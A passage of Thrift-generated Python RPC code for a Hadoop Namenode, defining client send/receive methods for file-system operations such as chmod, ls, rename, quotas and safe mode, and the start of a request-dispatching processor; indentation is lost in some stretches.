class Client(hadoop.api.common.HadoopServiceBase.Client, Iface):
"""
Provides an interface to a Hadoop Namenode. It is basically a Thrift
translation of org.apache.hadoop.hdfs.protocol.ClientProtocol.
"""
def __init__(self, iprot, oprot=None):
hadoop.api.common.HadoopServiceBase.Client.__init__(self, iprot, oprot)
def chmod(self, ctx, path, perms):
"""
Set permissions of an existing file or directory.
Parameters:
- ctx
- path: Path of the file or directory.
- perms: New permissions for the file or directory.
"""
self.send_chmod(ctx, path, perms)
self.recv_chmod()
def send_chmod(self, ctx, path, perms):
self._oprot.writeMessageBegin('chmod', TMessageType.CALL, self._seqid)
args = chmod_args()
args.ctx = ctx
args.path = path
args.perms = perms
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_chmod(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = chmod_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
def chown(self, ctx, path, owner, group):
"""
Set owner of a file or directory.
If either parameter 'owner' or 'group' is set to null, that
parameter is left unchanged.
Parameters 'owner' and 'group' cannot be both null.
Parameters:
- ctx
- path: Path to the file or directory
- owner: New owner.
- group: New group.
"""
self.send_chown(ctx, path, owner, group)
self.recv_chown()
def send_chown(self, ctx, path, owner, group):
self._oprot.writeMessageBegin('chown', TMessageType.CALL, self._seqid)
args = chown_args()
args.ctx = ctx
args.path = path
args.owner = owner
args.group = group
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_chown(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = chown_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
def df(self, ctx):
    """
    Return a list containing:
    (index 0) The total storage capacity of the file system (in bytes).
    (index 1) The total used space of the file system (in bytes).
    (index 2) The available storage of the file system (in bytes).

    Parameters:
     - ctx
    """
    # Blocking RPC: serialize the request, then return the decoded reply.
    self.send_df(ctx)
    return self.recv_df()
def send_df(self, ctx):
    # Write one CALL frame: message header, args struct, end marker, flush.
    self._oprot.writeMessageBegin('df', TMessageType.CALL, self._seqid)
    args = df_args()
    args.ctx = ctx
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_df(self, ):
    # Read the df reply; framework errors arrive as EXCEPTION messages.
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = df_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
        return result.success
    # Server replied but set no result field at all: protocol violation.
    raise TApplicationException(TApplicationException.MISSING_RESULT, "df failed: unknown result");
def enterSafeMode(self, ctx):
    """
    Enter safe mode.

    Parameters:
     - ctx
    """
    # Blocking RPC: serialize the request, then wait for the server reply.
    self.send_enterSafeMode(ctx)
    self.recv_enterSafeMode()
def send_enterSafeMode(self, ctx):
    # Write one CALL frame: message header, args struct, end marker, flush.
    self._oprot.writeMessageBegin('enterSafeMode', TMessageType.CALL, self._seqid)
    args = enterSafeMode_args()
    args.ctx = ctx
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_enterSafeMode(self, ):
    # Read the enterSafeMode reply; framework errors arrive as EXCEPTION messages.
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = enterSafeMode_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # Re-raise the server's declared IOException, if one was set.
    if result.err is not None:
        raise result.err
    return
def getBlocks(self, ctx, path, offset, length):
    """
    Get a list of all blocks containing a region of a file.

    Parameters:
     - ctx
     - path: Path to the file.
     - offset: Offset of the region.
     - length: Length of the region.
    """
    # Blocking RPC: serialize the request, then return the decoded reply.
    self.send_getBlocks(ctx, path, offset, length)
    return self.recv_getBlocks()
def send_getBlocks(self, ctx, path, offset, length):
    # Write one CALL frame: message header, args struct, end marker, flush.
    self._oprot.writeMessageBegin('getBlocks', TMessageType.CALL, self._seqid)
    args = getBlocks_args()
    args.ctx = ctx
    args.path = path
    args.offset = offset
    args.length = length
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_getBlocks(self, ):
    # Read the getBlocks reply; framework errors arrive as EXCEPTION messages.
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = getBlocks_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
        return result.success
    # Re-raise the server's declared IOException, if one was set.
    if result.err is not None:
        raise result.err
    # Neither success nor error field present: protocol violation.
    raise TApplicationException(TApplicationException.MISSING_RESULT, "getBlocks failed: unknown result");
def getPreferredBlockSize(self, ctx, path):
    """
    Get the preferred block size for the given file.

    The path must exist, or common.IOException is thrown.

    Parameters:
     - ctx
     - path: Path to the file.
    """
    # Blocking RPC: serialize the request, then return the decoded reply.
    self.send_getPreferredBlockSize(ctx, path)
    return self.recv_getPreferredBlockSize()
def send_getPreferredBlockSize(self, ctx, path):
    # Write one CALL frame: message header, args struct, end marker, flush.
    self._oprot.writeMessageBegin('getPreferredBlockSize', TMessageType.CALL, self._seqid)
    args = getPreferredBlockSize_args()
    args.ctx = ctx
    args.path = path
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_getPreferredBlockSize(self, ):
    # Read the reply; framework errors arrive as EXCEPTION messages.
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = getPreferredBlockSize_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
        return result.success
    # Re-raise the server's declared IOException, if one was set.
    if result.err is not None:
        raise result.err
    # Neither success nor error field present: protocol violation.
    raise TApplicationException(TApplicationException.MISSING_RESULT, "getPreferredBlockSize failed: unknown result");
def isInSafeMode(self, ctx):
    """
    Returns whether HDFS is in safe mode or not.

    Parameters:
     - ctx
    """
    # Blocking RPC: serialize the request, then return the decoded reply.
    self.send_isInSafeMode(ctx)
    return self.recv_isInSafeMode()
def send_isInSafeMode(self, ctx):
    # Write one CALL frame: message header, args struct, end marker, flush.
    self._oprot.writeMessageBegin('isInSafeMode', TMessageType.CALL, self._seqid)
    args = isInSafeMode_args()
    args.ctx = ctx
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_isInSafeMode(self, ):
    # Read the reply; framework errors arrive as EXCEPTION messages.
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = isInSafeMode_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
        return result.success
    # Re-raise the server's declared IOException, if one was set.
    if result.err is not None:
        raise result.err
    # Neither success nor error field present: protocol violation.
    raise TApplicationException(TApplicationException.MISSING_RESULT, "isInSafeMode failed: unknown result");
def leaveSafeMode(self, ctx):
    """
    Leave safe mode.

    Parameters:
     - ctx
    """
    # Blocking RPC: serialize the request, then wait for the server reply.
    self.send_leaveSafeMode(ctx)
    self.recv_leaveSafeMode()
def send_leaveSafeMode(self, ctx):
    # Write one CALL frame: message header, args struct, end marker, flush.
    self._oprot.writeMessageBegin('leaveSafeMode', TMessageType.CALL, self._seqid)
    args = leaveSafeMode_args()
    args.ctx = ctx
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_leaveSafeMode(self, ):
    # Read the reply; framework errors arrive as EXCEPTION messages.
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = leaveSafeMode_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # Re-raise the server's declared IOException, if one was set.
    if result.err is not None:
        raise result.err
    return
def ls(self, ctx, path):
    """
    Get a listing of the indicated directory.

    Parameters:
     - ctx
     - path: Path to the directory.
    """
    # Blocking RPC: serialize the request, then return the decoded reply.
    self.send_ls(ctx, path)
    return self.recv_ls()
def send_ls(self, ctx, path):
    # Write one CALL frame: message header, args struct, end marker, flush.
    self._oprot.writeMessageBegin('ls', TMessageType.CALL, self._seqid)
    args = ls_args()
    args.ctx = ctx
    args.path = path
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_ls(self, ):
    # Read the ls reply; framework errors arrive as EXCEPTION messages.
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = ls_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
        return result.success
    # Re-raise the server's declared IOException, if one was set.
    if result.err is not None:
        raise result.err
    # Neither success nor error field present: protocol violation.
    raise TApplicationException(TApplicationException.MISSING_RESULT, "ls failed: unknown result");
def mkdirhier(self, ctx, path, perms):
    """
    Create a directory (or hierarchy of directories).

    Returns false if directory did not exist and could not be created,
    true otherwise.

    Parameters:
     - ctx
     - path: Path to the directory.
     - perms: Access permissions of the directory.
    """
    # Blocking RPC: serialize the request, then return the decoded reply.
    self.send_mkdirhier(ctx, path, perms)
    return self.recv_mkdirhier()
def send_mkdirhier(self, ctx, path, perms):
    # Write one CALL frame: message header, args struct, end marker, flush.
    self._oprot.writeMessageBegin('mkdirhier', TMessageType.CALL, self._seqid)
    args = mkdirhier_args()
    args.ctx = ctx
    args.path = path
    args.perms = perms
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_mkdirhier(self, ):
    # Read the reply; framework errors arrive as EXCEPTION messages.
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = mkdirhier_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
        return result.success
    # Re-raise the server's declared IOException, if one was set.
    if result.err is not None:
        raise result.err
    # Neither success nor error field present: protocol violation.
    raise TApplicationException(TApplicationException.MISSING_RESULT, "mkdirhier failed: unknown result");
def refreshNodes(self, ctx):
    """
    Tells the name node to reread the hosts and exclude files.

    Parameters:
     - ctx
    """
    # Blocking RPC: serialize the request, then wait for the server reply.
    self.send_refreshNodes(ctx)
    self.recv_refreshNodes()
def send_refreshNodes(self, ctx):
    # Write one CALL frame: message header, args struct, end marker, flush.
    self._oprot.writeMessageBegin('refreshNodes', TMessageType.CALL, self._seqid)
    args = refreshNodes_args()
    args.ctx = ctx
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_refreshNodes(self, ):
    # Read the reply; framework errors arrive as EXCEPTION messages.
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = refreshNodes_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # Re-raise the server's declared IOException, if one was set.
    if result.err is not None:
        raise result.err
    return
def rename(self, ctx, path, newPath):
    """
    Rename an item in the file system namespace.

    Returns true if successful, or
    false if the old name does not exist or if the new name already
    belongs to the namespace.

    Parameters:
     - ctx
     - path: Path to existing file or directory.
     - newPath: New path.
    """
    # Blocking RPC: serialize the request, then return the decoded reply.
    self.send_rename(ctx, path, newPath)
    return self.recv_rename()
def send_rename(self, ctx, path, newPath):
    # Write one CALL frame: message header, args struct, end marker, flush.
    self._oprot.writeMessageBegin('rename', TMessageType.CALL, self._seqid)
    args = rename_args()
    args.ctx = ctx
    args.path = path
    args.newPath = newPath
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_rename(self, ):
    # Read the reply; framework errors arrive as EXCEPTION messages.
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = rename_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
        return result.success
    # Re-raise the server's declared IOException, if one was set.
    if result.err is not None:
        raise result.err
    # Neither success nor error field present: protocol violation.
    raise TApplicationException(TApplicationException.MISSING_RESULT, "rename failed: unknown result");
def reportBadBlocks(self, ctx, blocks):
    """
    Report corrupted blocks.

    Parameters:
     - ctx
     - blocks: List of corrupted blocks.
    """
    # Blocking RPC: serialize the request, then wait for the server reply.
    self.send_reportBadBlocks(ctx, blocks)
    self.recv_reportBadBlocks()
def send_reportBadBlocks(self, ctx, blocks):
    # Write one CALL frame: message header, args struct, end marker, flush.
    self._oprot.writeMessageBegin('reportBadBlocks', TMessageType.CALL, self._seqid)
    args = reportBadBlocks_args()
    args.ctx = ctx
    args.blocks = blocks
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_reportBadBlocks(self, ):
    # Read the reply; framework errors arrive as EXCEPTION messages.
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = reportBadBlocks_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # Re-raise the server's declared IOException, if one was set.
    if result.err is not None:
        raise result.err
    return
def stat(self, ctx, path):
    """
    Get information about a path in HDFS.

    Return value will be null if path does not exist.

    Parameters:
     - ctx
     - path: Path of the file or directory.
    """
    # Blocking RPC: serialize the request, then return the decoded reply.
    self.send_stat(ctx, path)
    return self.recv_stat()
def send_stat(self, ctx, path):
    # Write one CALL frame: message header, args struct, end marker, flush.
    self._oprot.writeMessageBegin('stat', TMessageType.CALL, self._seqid)
    args = stat_args()
    args.ctx = ctx
    args.path = path
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_stat(self, ):
    # Read the reply; framework errors arrive as EXCEPTION messages.
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = stat_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
        return result.success
    # Re-raise the server's declared IOException, if one was set.
    if result.err is not None:
        raise result.err
    # Neither success nor error field present: protocol violation.
    raise TApplicationException(TApplicationException.MISSING_RESULT, "stat failed: unknown result");
def getContentSummary(self, ctx, Path):
    """
    Get the summary of a directory's contents.

    Note that this has runtime linear in the total number of nodes
    in the directory tree - this can be expensive for directories
    near the top of a big HDFS. Use with care.

    Parameters:
     - ctx
     - Path
    """
    # Blocking RPC: serialize the request, then return the decoded reply.
    # NOTE: 'Path' is capitalized in the generated interface; kept as-is
    # because callers may pass it by keyword.
    self.send_getContentSummary(ctx, Path)
    return self.recv_getContentSummary()
def send_getContentSummary(self, ctx, Path):
    # Write one CALL frame: message header, args struct, end marker, flush.
    self._oprot.writeMessageBegin('getContentSummary', TMessageType.CALL, self._seqid)
    args = getContentSummary_args()
    args.ctx = ctx
    args.Path = Path
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_getContentSummary(self, ):
    # Read the reply; framework errors arrive as EXCEPTION messages.
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = getContentSummary_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
        return result.success
    # Re-raise the server's declared IOException, if one was set.
    if result.err is not None:
        raise result.err
    # Neither success nor error field present: protocol violation.
    raise TApplicationException(TApplicationException.MISSING_RESULT, "getContentSummary failed: unknown result");
def multiGetContentSummary(self, ctx, paths):
    """
    Get ContentSummary objects for multiple directories simultaneously. The same warnings
    apply as for getContentSummary(...) above.

    Parameters:
     - ctx
     - paths
    """
    # Blocking RPC: serialize the request, then return the decoded reply.
    self.send_multiGetContentSummary(ctx, paths)
    return self.recv_multiGetContentSummary()
def send_multiGetContentSummary(self, ctx, paths):
    # Write one CALL frame: message header, args struct, end marker, flush.
    self._oprot.writeMessageBegin('multiGetContentSummary', TMessageType.CALL, self._seqid)
    args = multiGetContentSummary_args()
    args.ctx = ctx
    args.paths = paths
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_multiGetContentSummary(self, ):
    # Read the reply; framework errors arrive as EXCEPTION messages.
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = multiGetContentSummary_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
        return result.success
    # Re-raise the server's declared IOException, if one was set.
    if result.err is not None:
        raise result.err
    # Neither success nor error field present: protocol violation.
    raise TApplicationException(TApplicationException.MISSING_RESULT, "multiGetContentSummary failed: unknown result");
def setQuota(self, ctx, path, namespaceQuota, diskspaceQuota):
    """
    Set the quota for a directory.

    Quota parameters may have three types of values:
    (1) 0 or more: Quota will be set to that value.
    (2) QUOTA_DONT_SET: Quota will not be changed,
    (3) QUOTA_RESET: Quota will be reset.

    Any other value is a runtime error.

    Parameters:
     - ctx
     - path: Path of the directory.
     - namespaceQuota: Limit on the number of names in the directory.
     - diskspaceQuota: Limit on disk space occupied by all the files in the
       directory.
    """
    # Blocking RPC: serialize the request, then wait for the server reply.
    self.send_setQuota(ctx, path, namespaceQuota, diskspaceQuota)
    self.recv_setQuota()
def send_setQuota(self, ctx, path, namespaceQuota, diskspaceQuota):
    # Write one CALL frame: message header, args struct, end marker, flush.
    self._oprot.writeMessageBegin('setQuota', TMessageType.CALL, self._seqid)
    args = setQuota_args()
    args.ctx = ctx
    args.path = path
    args.namespaceQuota = namespaceQuota
    args.diskspaceQuota = diskspaceQuota
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_setQuota(self, ):
    # Read the reply; framework errors arrive as EXCEPTION messages.
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = setQuota_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # Re-raise the server's declared IOException, if one was set.
    if result.err is not None:
        raise result.err
    return
def setReplication(self, ctx, path, replication):
    """
    Set replication factor for an existing file.

    This call just updates the value of the replication factor. The actual
    block replication is not expected to be performed during this method call.
    The blocks will be populated or removed in the background as the result of
    the routine block maintenance procedures.

    Returns true if successful, false if file does not exist or is a
    directory.

    Parameters:
     - ctx
     - path: Path of the file.
     - replication: New replication factor.
    """
    # Blocking RPC: serialize the request, then return the decoded reply.
    self.send_setReplication(ctx, path, replication)
    return self.recv_setReplication()
def send_setReplication(self, ctx, path, replication):
    # Write one CALL frame: message header, args struct, end marker, flush.
    self._oprot.writeMessageBegin('setReplication', TMessageType.CALL, self._seqid)
    args = setReplication_args()
    args.ctx = ctx
    args.path = path
    args.replication = replication
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_setReplication(self, ):
    # Read the reply; framework errors arrive as EXCEPTION messages.
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = setReplication_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
        return result.success
    # Re-raise the server's declared IOException, if one was set.
    if result.err is not None:
        raise result.err
    # Neither success nor error field present: protocol violation.
    raise TApplicationException(TApplicationException.MISSING_RESULT, "setReplication failed: unknown result");
def unlink(self, ctx, path, recursive):
    """
    Delete a file or directory from the file system.

    Any blocks belonging to the deleted files will be garbage-collected.

    Parameters:
     - ctx
     - path: Path of the file or directory.
     - recursive: Delete a non-empty directory recursively.
    """
    # Blocking RPC: serialize the request, then return the decoded reply.
    self.send_unlink(ctx, path, recursive)
    return self.recv_unlink()
def send_unlink(self, ctx, path, recursive):
    # Write one CALL frame: message header, args struct, end marker, flush.
    self._oprot.writeMessageBegin('unlink', TMessageType.CALL, self._seqid)
    args = unlink_args()
    args.ctx = ctx
    args.path = path
    args.recursive = recursive
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_unlink(self, ):
    # Read the reply; framework errors arrive as EXCEPTION messages.
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = unlink_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
        return result.success
    # Re-raise the server's declared IOException, if one was set.
    if result.err is not None:
        raise result.err
    # Neither success nor error field present: protocol violation.
    raise TApplicationException(TApplicationException.MISSING_RESULT, "unlink failed: unknown result");
def utime(self, ctx, path, atime, mtime):
    """
    Sets the modification and access time of a file or directory.

    Setting *one single time parameter* to -1 means that time parameter
    must not be set by this call.
    Setting *both time parameters* to -1 means both of them must be set to
    the current time.

    Parameters:
     - ctx
     - path: Path of the file or directory.
     - atime: Access time in milliseconds since 1970-01-01 00:00 UTC
     - mtime: Modification time in milliseconds since 1970-01-01 00:00 UTC
    """
    # Blocking RPC: serialize the request, then wait for the server reply.
    self.send_utime(ctx, path, atime, mtime)
    self.recv_utime()
def send_utime(self, ctx, path, atime, mtime):
    # Write one CALL frame: message header, args struct, end marker, flush.
    self._oprot.writeMessageBegin('utime', TMessageType.CALL, self._seqid)
    args = utime_args()
    args.ctx = ctx
    args.path = path
    args.atime = atime
    args.mtime = mtime
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_utime(self, ):
    # Read the reply; framework errors arrive as EXCEPTION messages.
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = utime_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # Re-raise the server's declared IOException, if one was set.
    if result.err is not None:
        raise result.err
    return
def datanodeUp(self, name, storage, thriftPort):
    """
    Inform the namenode that a datanode process has started.

    Parameters:
     - name: <host name>:<port number> of the datanode
     - storage: the storage id of the datanode
     - thriftPort: Thrift port of the datanode
    """
    # Blocking RPC; note this call takes no request context (ctx).
    self.send_datanodeUp(name, storage, thriftPort)
    self.recv_datanodeUp()
def send_datanodeUp(self, name, storage, thriftPort):
    # Write one CALL frame: message header, args struct, end marker, flush.
    self._oprot.writeMessageBegin('datanodeUp', TMessageType.CALL, self._seqid)
    args = datanodeUp_args()
    args.name = name
    args.storage = storage
    args.thriftPort = thriftPort
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_datanodeUp(self, ):
    # Read the reply; this method declares no application exceptions,
    # so only framework-level EXCEPTION frames can be raised here.
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = datanodeUp_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    return
def datanodeDown(self, name, storage, thriftPort):
    """
    Inform the namenode that a datanode process has stopped.

    Parameters:
     - name: <host name>:<port number> of the datanode
     - storage: the storage id of the datanode
     - thriftPort: Thrift port of the datanode
    """
    # Blocking RPC; note this call takes no request context (ctx).
    self.send_datanodeDown(name, storage, thriftPort)
    self.recv_datanodeDown()
def send_datanodeDown(self, name, storage, thriftPort):
    # Write one CALL frame: message header, args struct, end marker, flush.
    self._oprot.writeMessageBegin('datanodeDown', TMessageType.CALL, self._seqid)
    args = datanodeDown_args()
    args.name = name
    args.storage = storage
    args.thriftPort = thriftPort
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_datanodeDown(self, ):
    # Read the reply; this method declares no application exceptions,
    # so only framework-level EXCEPTION frames can be raised here.
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = datanodeDown_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    return
def getDelegationToken(self, ctx, renewer):
    """
    Get an HDFS delegation token.

    Parameters:
     - ctx
     - renewer
    """
    # Blocking RPC: serialize the request, then return the decoded reply.
    self.send_getDelegationToken(ctx, renewer)
    return self.recv_getDelegationToken()
def send_getDelegationToken(self, ctx, renewer):
    # Write one CALL frame: message header, args struct, end marker, flush.
    self._oprot.writeMessageBegin('getDelegationToken', TMessageType.CALL, self._seqid)
    args = getDelegationToken_args()
    args.ctx = ctx
    args.renewer = renewer
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_getDelegationToken(self, ):
    # Read the reply; framework errors arrive as EXCEPTION messages.
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = getDelegationToken_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
        return result.success
    # Re-raise the server's declared IOException, if one was set.
    if result.err is not None:
        raise result.err
    # Neither success nor error field present: protocol violation.
    raise TApplicationException(TApplicationException.MISSING_RESULT, "getDelegationToken failed: unknown result");
class Processor(hadoop.api.common.HadoopServiceBase.Processor, Iface, TProcessor):
def __init__(self, handler):
hadoop.api.common.HadoopServiceBase.Processor.__init__(self, handler)
self._processMap["chmod"] = Processor.process_chmod
self._processMap["chown"] = Processor.process_chown
self._processMap["df"] = Processor.process_df
self._processMap["enterSafeMode"] = Processor.process_enterSafeMode
self._processMap["getBlocks"] = Processor.process_getBlocks
self._processMap["getPreferredBlockSize"] = Processor.process_getPreferredBlockSize
self._processMap["isInSafeMode"] = Processor.process_isInSafeMode
self._processMap["leaveSafeMode"] = Processor.process_leaveSafeMode
self._processMap["ls"] = Processor.process_ls
self._processMap["mkdirhier"] = Processor.process_mkdirhier
self._processMap["refreshNodes"] = Processor.process_refreshNodes
self._processMap["rename"] = Processor.process_rename
self._processMap["reportBadBlocks"] = Processor.process_reportBadBlocks
self._processMap["stat"] = Processor.process_stat
self._processMap["getContentSummary"] = Processor.process_getContentSummary
self._processMap["multiGetContentSummary"] = Processor.process_multiGetContentSummary
self._processMap["setQuota"] = Processor.process_setQuota
self._processMap["setReplication"] = Processor.process_setReplication
self._processMap["unlink"] = Processor.process_unlink
self._processMap["utime"] = Processor.process_utime
self._processMap["datanodeUp"] = Processor.process_datanodeUp
self._processMap["datanodeDown"] = Processor.process_datanodeDown
self._processMap["getDelegationToken"] = Processor.process_getDelegationToken
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_chmod(self, seqid, iprot, oprot):
args = chmod_args()
args.read(iprot)
iprot.readMessageEnd()
result = chmod_result()
try:
self._handler.chmod(args.ctx, args.path, args.perms)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("chmod", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_chown(self, seqid, iprot, oprot):
args = chown_args()
args.read(iprot)
iprot.readMessageEnd()
result = chown_result()
try:
self._handler.chown(args.ctx, args.path, args.owner, args.group)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("chown", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_df(self, seqid, iprot, oprot):
args = df_args()
args.read(iprot)
iprot.readMessageEnd()
result = df_result()
result.success = self._handler.df(args.ctx)
oprot.writeMessageBegin("df", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_enterSafeMode(self, seqid, iprot, oprot):
args = enterSafeMode_args()
args.read(iprot)
iprot.readMessageEnd()
result = enterSafeMode_result()
try:
self._handler.enterSafeMode(args.ctx)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("enterSafeMode", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getBlocks(self, seqid, iprot, oprot):
